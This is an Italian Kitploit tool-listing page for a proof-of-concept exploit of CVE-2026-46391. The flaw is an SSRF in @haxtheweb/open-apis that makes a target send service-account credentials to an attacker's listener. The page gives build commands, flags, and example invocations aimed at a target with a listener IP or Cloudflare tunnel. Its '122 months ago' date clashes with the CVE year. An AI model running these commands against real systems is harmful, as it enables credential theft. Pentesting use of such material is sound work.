Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2026-46391 — Proof of concept exploit per CVE-2026-46391 | Kitploit
Strumenti/GitHubGitHub/bradyjmcl/cve-2026-46391
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubbradyjmcl/cve-2026-46391

cve-2026-46391

Proof of concept exploit per CVE-2026-46391

Vedi Repository
122 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-46391 - Esposizione di Credenziali tramite SSRF in @haxtheweb/open-apis

test

Proof of concept per CVE-2026-46391. Sfrutta la vulnerabilità SSRF nell'endpoint cacheAddress di @haxtheweb/open-apis e cattura le credenziali dell'account di servizio inviate nel callback.

Compilazione

root@kitploit:~
go build -o cve-2026-46391 .

Test

root@kitploit:~
go test ./...

Utilizzo

root@kitploit:~
./cve-2026-46391 -u <web-root> -l <listener> [-p port] [-t seconds] [-v]
Scarica lo strumento

Opzioni

FlagDescrizionePredefinito
-u, --urlRoot web di destinazione (es. http://10.10.0.80:3000)obbligatorio
-l, --listenerIl tuo IP/hostname o URL tunnel (es. 192.168.1.10, https://uuid.trycloudflare.com)obbligatorio
-p, --portPorta locale su cui ascoltare8080
-t, --timeoutSecondi di attesa per il callback30
-v, --verboseStampa header e corpo di ogni richiesta in entratadisattivato

Esempi

Diretto (stessa rete del target):

root@kitploit:~
./cve-2026-46391 -u http://10.10.0.80:3000 -l 10.10.15.201

Tramite VPS/tunnel Cloudflare/ecc:

root@kitploit:~
./cve-2026-46391 -u http://10.10.0.80:3000 -l https://random-words.trycloudflare.com

Porta e timeout personalizzati:

root@kitploit:~
./cve-2026-46391 -u http://10.10.0.80:3000 -l 10.10.15.201 -p 9090 -t 60